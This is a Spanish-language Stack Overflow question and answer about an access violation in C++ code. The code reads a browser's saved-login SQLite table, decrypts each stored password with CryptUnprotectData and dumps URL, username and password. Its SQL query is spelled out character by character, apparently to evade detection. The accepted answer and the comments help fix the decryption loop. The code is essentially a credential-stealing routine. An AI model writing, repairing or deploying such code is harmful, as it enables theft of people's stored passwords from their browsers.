# Access Violation Error in isPrint() function c++

Tags: c++, string, stream

estaba haciendo una pequeña prueba para ver como funciona la funcion CryptUnprotectData de la libreria de Windows, y de repente no me para de salir este error...

He estado como una hora o asi intentando arreglarlo, probando con strings normales, etc, pero no he conseguido arreglarlo, si alguien tiene una idea de donde podria estar el error

> Unhandled exception in 0x00007FF786213980 in LilCryptUnprotectData.exe: 0xC0000005: Access violation when reading location 0xFFFFFFFFFFFFFFFF.

```cpp
stringstream KChrom::k_DumpPasswords(sqlite3 * m_DatabaseBuffer) {

    stringstream m_BufferDumpPasswords(string(""));

    //const char* m_SqlCommandDumper = "SELECT action_url, username_value, password_value FROM logins";
    CHAR m_SqlCommandDumper[] = { 'S', 'E', 'L', 'E', 'C', 'T', ' ', '*', ' ', 'F', 'R', 'O', 'M', ' ', 'l', 'o', 'g', 'i', 'n', 's', ';', 0x0 };
    sqlite3_stmt *m_VirtualDatabase;
    int m_Response;

    m_Response = sqlite3_prepare(m_DatabaseBuffer, m_SqlCommandDumper, -1, &m_VirtualDatabase, 0);

    if(m_Response != SQLITE_OK)
        return stringstream("ERROR DUMPING DATABASE PASSWORDS");

    m_Response = sqlite3_step(m_VirtualDatabase);

    printf("m_Response = %d", m_Response);

    while(m_Response == SQLITE_ROW) {
        m_BufferDumpPasswords << "URL: ";
        m_BufferDumpPasswords << sqlite3_column_text(m_VirtualDatabase, 0) << endl;
        m_BufferDumpPasswords << "USERNAME: ";
        m_BufferDumpPasswords << (char*)sqlite3_column_text(m_VirtualDatabase, 1) << endl;

        DATA_BLOB m_EncryptedPasswordsDatabase, m_DecryptedPasswordsDatabase;
        m_BufferDumpPasswords << "PASSWORD: ";

        m_EncryptedPasswordsDatabase.cbData = (DWORD)sqlite3_column_bytes(m_VirtualDatabase, 2);
        m_EncryptedPasswordsDatabase.pbData = (BYTE *)malloc((int)m_EncryptedPasswordsDatabase.cbData);

        std::memcpy(m_EncryptedPasswordsDatabase.pbData, sqlite3_column_blob(m_VirtualDatabase, 2), (int)m_EncryptedPasswordsDatabase.cbData);

        CryptUnprotectData(&m_EncryptedPasswordsDatabase, NULL, NULL, NULL, NULL, 0, &m_DecryptedPasswordsDatabase);

        char* m_Temp = (char*)m_DecryptedPasswordsDatabase.pbData;
        std::cout << (char*)m_Temp << std::endl;
        while(isprint(*m_Temp)) { // Aqui es donde me sale el error
            m_BufferDumpPasswords << *m_Temp;
            m_Temp++;
        }
        m_BufferDumpPasswords << endl;
        m_Response = sqlite3_step(m_VirtualDatabase);
    }
    m_Response = sqlite3_finalize(m_VirtualDatabase);
    return m_BufferDumpPasswords;
}
```

Comment: Por favor traduce tu pregunta estás en SO en español

Comment: Listo, ya lo he traducido al español.

Answer (score 0, accepted):

Creo que el problema puede estar aquí:

```
    int len = static_cast<int>(m_EncryptedPasswordsDatabase.cbData);
    while((--len >= 0) && isprint(*m_Temp)) { // Necesito verificar
        m_BufferDumpPasswords << *m_Temp;
        m_Temp++;
    }
```

Comment: Ahora da el problema la función de isprint, tal que asi: c>= -1 && c <= 255, seguramente sea porque este leyendo un caracter que no sea printeable, puede ser no?

Comment: static_cast aqui debe ayudar: isprint(static_cast<unsigned char>(*m_Temp))